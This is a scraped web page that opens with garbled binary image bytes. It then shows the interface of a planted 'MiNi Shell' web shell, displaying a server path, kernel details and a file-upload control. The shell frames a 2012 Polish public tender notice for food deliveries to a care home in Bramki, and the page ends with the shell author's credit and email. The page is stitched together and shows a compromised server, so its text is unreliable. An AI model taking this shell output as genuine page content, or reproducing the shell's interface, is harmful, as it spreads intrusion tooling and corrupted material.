JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/193270-N-2012.html

<p class="kh_header"><b>Błonie: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Bramkach na II półrocze 2012 roku.</b><br>
<b>Numer ogłoszenia: 193270 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bramkach , ul. Północna 18, 05-870 Błonie, woj. mazowieckie, tel. 0-22 7256127, faks 0-22 7256066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsbramki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Bramkach na II półrocze 2012 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1. ARTYKUŁY SPOŻYWCZE
Ananasy w puszce 565 g. - 50 szt;
Aromaty 9 ml. - 80 szt;
Bakalie (mieszanka) 200 g. - 20 szt;
Barszcz biały 66 g.- 120 szt;
Bazylia 10 g. - 50 szt;
Brzoskwinie 820 g. - 50 szt;
Budyń czekoladowy 63 g. - 200 szt;
Budyń śmietankowy 60 g. - 400 szt;
Budyń bez cukru 60 g. - 300 szt;
Chrzan 320 g. - 120 szt;
Cukier 1 kg. - 1600 kg;
Cukier puder 0,4 kg. - 45 kg;
Cukier waniliowy 32 g. - 180 szt;
Cynamon 20 g. - 60 szt;
Czosnek mielony 20 g. - 110 szt;
Dżem niskosłodzony 280 g. - 650 szt;
Fasola sucha 500 g. - 120 kg;
Fasola konserwowa 500 g. - 80 szt;
Fasola czerwona konserwowa 400 g. - 160 szt; 
Galaretka owocowa z cukrem 79 g. - 180 szt;
Gałka muszkatołowa 20 g. - 25 szt;
Groszek konserwowy 400 g. - 320 szt; 
Herbata granulowana 100 g. - 100 kg;
Kakao 100 g. - 70 szt;
Kasza jęczmienna 1 kg. - 150 kg;
Kasza manna 1 kg. - 180 kg;
Ketchup 500 g. łagodny min. 35 % wkładu pomidorów - 150 szt;
Kisiel z cukrem 77 g. - 200 szt;
Kisiel bez cukru 77 g. - 240 szt;
Koktajl owoców w syropie 850 g. - 15 szt;
Koncentrat pomidorowy 900 g.  - 170 szt;
Konserwa rybna w oleju 170 g. - 150 szt;
Konserwa rybna w pomidorach 170 g. - 190 szt;
Kukurydza konserwowa 400 g. - 170 szt;
Kwasek cytrynowy 50 g. - 50 szt;
Liście laurowe 6 g. - 200 szt;
Majeranek 10 g. - 150 szt;
Majonez 420 g. - 180 szt;
Mak 500 g. - 15 kg;
Makaron nitki 500 g. - 80 kg;
Makaron krajanka gruba 5 kg. - 100 kg;
Makaron świderki 5 kg. - 450 kg;
Marmolada 600 g. - 20 szt;
Mąka pszenna typ 480  1 kg - 400 kg; 
Mąka ziemniaczana 1 kg. - 20 kg;
Mieszanka owoców kandyzowanych 100 g. - 30 szt;
Miód 300 g. - 10 szt;
Musli  - 120 kg;
Musztarda 200 g. - 120 szt;
Ocet 0,5 l (10 %) - 15 szt;
Ogórki konserwowe 900 g. - 100 szt; 
Olej 1 l - 350 szt;
Oregano 10 g.- 50 szt;
Papryka konserwowa 850 g. - 150 szt;
Papryka mielona 20 g. - 40 szt;
Pasztet z drobiu 155 g. - 100 szt; 
Pieprz naturalny mielony 20 g. - 350 szt;
Płatki owsiane 1 kg. - 100 kg;
Płatki kukurydziane 5 kg. - 100 kg;
Płatki jęczmienne 5 kg.  - 100 kg; 
Proszek do pieczenia 36 g. - 100 szt;
Przyprawa do ryb 20 g. - 50 szt; 
Przyprawa do drobiu 20 g. - 80 szt; 
Przyprawa do kuchni włoskiej 20 g. - 90 szt;
Przyprawa gros 20 g. - 100 szt;
Rodzynki 200 g. - 60 szt;
Ryż 1 kg.  - 300 kg;
Sałatka szwedzka 850 g. - 60 szt;
Sól 1 kg.  - 350 kg;
Szczaw konserwowy 320 g. - 100 szt;
Śliwki suszone 100 g. - 5 kg;
Tymianek 10 g. - 30 szt; 
Przyprawa uniwersalna do potraw 200 g. - 220 szt; 
Wiórki kokosowe 200 g. - 30 szt; 
Ziele angielskie 12 g. - 200 szt; 
Zupa grzybowa 37 g. - 250 szt; 
Zupa ogonowa 62 g. - 250 szt; 
Zupa pieczarkowa 44 g. - 200 szt; 
Żelatyna 50 g. - 50 szt; 
Soda oczyszczona 8 g. - 30 szt.

ZADANIE 2. MIĘSO, WĘDLINA, DRÓB
Baleron odtłuszczony - 120 kg;
Baleron wędzony - 50 kg;
Boczek pieczony - 15 kg;
Boczek prasowany - 90 kg;
Boczek surowy b/k - 50 kg;
Boczek wędzony - 30 kg;
Golonka wieprzowa - 30 kg;
Kaszanka - 170 kg;
Kiełbasa biała - 40 kg;
Kiełbasa cytrynowa - 120 kg;
Kiełbasa dębicka - 120 kg;
Kiełbasa krakowska  - 80 kg;
Kiełbasa parówkowa - 165 kg;
Kiełbasa podwawelska - 90 kg;
Kiełbasa szynkowa wieprzowa - 145 kg;
Kiełbasa zwyczajna - 160 kg;
Kiełbasa żywiecka - 125 kg;
Korpusy z kurczaka - 170 kg;
Kości wędzone - 120 kg;
Kurczaki całe - 270 kg;
Łopatka z kością - 500 kg;
Łopatka pieczona - 80 kg;
Łopatka bez kości - 40 kg;
Mielonka wieprzowa - 90 kg;
Mięso mielone - 600 kg;
Mięso wołowe b/k - 250 kg;
Mięso wołowe z kością (antrykot) - 120 kg;
Mortadela - 80 kg;
Mortadela z warzywami - 80 kg;
Polędwica w warzywami - 80 kg;
Nogi wieprzowe - 80 kg;
Ogonówka - 150 kg;
Parówki cienkie - 140 kg;
Parówki drobiowe - 190 kg;
Pasztet drobiowy pieczony - 120 kg;
Pasztetowa kremowa - 100 kg;
Pasztetowa drobiowa - 80 kg;
Wątrobianka - 120 kg;
Pieczeń wieprzowa rzymska - 70 kg;
Piersi z indyka (filet) - 30 kg;
Piersi z kurczaka (filet) - 270 kg;
Polędwica sopocka - 40 kg;
Salceson włoski - 80 kg;
Schab karkowy z kością - 120 kg;
Schab pieczony - 20 kg;
Schab środkowy z kością - 290 kg; 
Słonina - 90 kg;
Smalec - 30 kg;
Szynka gotowana - 130 kg;
Szynka wędzona - 110 kg;
Szynka drobiowa - 140 kg;
Baton drobiowy z kurczaka - 50 kg;
Polędwica drobiowa - 120 kg;
Szynka wieprzowa z kością - 90 kg;
Udziec kurczaka - 60 kg;
Wątroba wieprzowa - 140 kg;
Żebra paski - 60 kg.

ZADANIE 3. RYBY

Panga biała filet mrożony b/sk - 400 kg;
Ryba wędzona - 100 kg;
Śledź płaty - 150 kg;

ZADANIE 4. WARZYWA, OWOCE

Botwina - 120 pęczków;
Brokuły - 300 szt;
Buraki czerwone - 600 kg;
Cebula - 500 kg; 
Cukinia - 30 kg;
Czosnek główki - 150 główek;
Dynia - 150 kg;
Gruszka - 200 kg;
Jabłka - 2000 kg; 
Kabaczek - 100 kg; 
Kalafior - 400 szt; 
Kapusta biała - 250 kg;
Kapusta czerwona - 120 kg;
Kapusta kiszona - 400 kg;
Kapusta młoda - 200 kg; 
Kapusta pekińska - 220 kg;
Koper - 200 pęczków;
Marchew - 1700 kg;
Natka - 360 pęczków;
Ogórki kiszone - 500 kg;
Ogórki świeże - 180 kg;
Papryka świeża - 180 kg;
Pieczarki - 250 kg;
Pietruszka korzeń - 400 kg;
Pomidory - 1000 kg;
Por - 200 kg; 
Rabarbar - 100 kg; 
Rzodkiewka - 350 pęczków;
Sałata masłowa - 450 szt; 
Sałata lodowa - 50 szt; 
Seler - 230 kg; 
Szczypior - 400 pęczków;
Śliwki - 300 kg;
Truskawki świeże - 350 kg; 
Wiśnia - 300 kg; 
Ziemniaki - 9000 kg; 
Ziemniaki młode - 2000 kg.

ZADANIE 5. NABIAŁ

Jogurt naturalny w kubku 370 g. - 750 szt;
Masło roślinne w kostce 250 g. - 5000 szt;
Mleko 2% w folii - 1 litr - 5000 litrów;
Mleko 2% w kartonie - 1 litr - 200 litrów;
Ser biały półtłusty - 400 kg;
Ser biały chudy - 150 kg;
Ser topiony 100 g. - 1200 szt;
Ser żółty o zawartości 45% tłuszczu - 80 kg;
Ser żółty o zawartości 13% tłuszczu - 60 kg;
Śmietana 18 % - 1 litr - 220 litrów;
Śmietana 30 % - 1 litr - 40 litrów.

ZADANIE 6. PIECZYWO.

Bułki paryskie 450 g. - 9000 szt;
Bułki kajzerki 50 g. - 250 szt;
Bułki słodkie 100 g. - 200 szt;
Bułki maślane 80 g. - 300 szt;
Chleb pszenno - żytni 500 g. - 7000 szt;
Chleb razowy 500 g. - 1900 szt.

ZADANIE 7. JAJA

Jaja klasa A 65 - 70 g - 21600 SZT..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych, tj. dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; posiadania wiedzy i doświadczenia; sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych, należy przedłożyć: oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 według wzoru określonego w załączniku nr 2 do SWIZ; wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia dostaw (w przypadku świadczeń okresowych lub ciągłych również wykonywanych), a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym podmiot zamówienia - załącznik nr 4 do SWIZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  Zamawiającego, Wykonawcy zobowiązani są załączyć do oferty dokument potwierdzający stosowanie wdrożonego systemu HACCP albo oświadczenie Wykonawcy potwierdzające stosowanie zasad dobrej praktyki higienicznej (GHP).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potwierdzenia niepodlegania wykluczeniu przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, należy przedłożyć:
Oświadczenie o braku podstaw do wykluczenia - według wzoru określonego w załączniku nr 3 do SWIZ;
Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustaw Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsbramki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie. Specyfikacja dostępna będzie w sekretariacie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2012 godzina 11:00, miejsce: Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com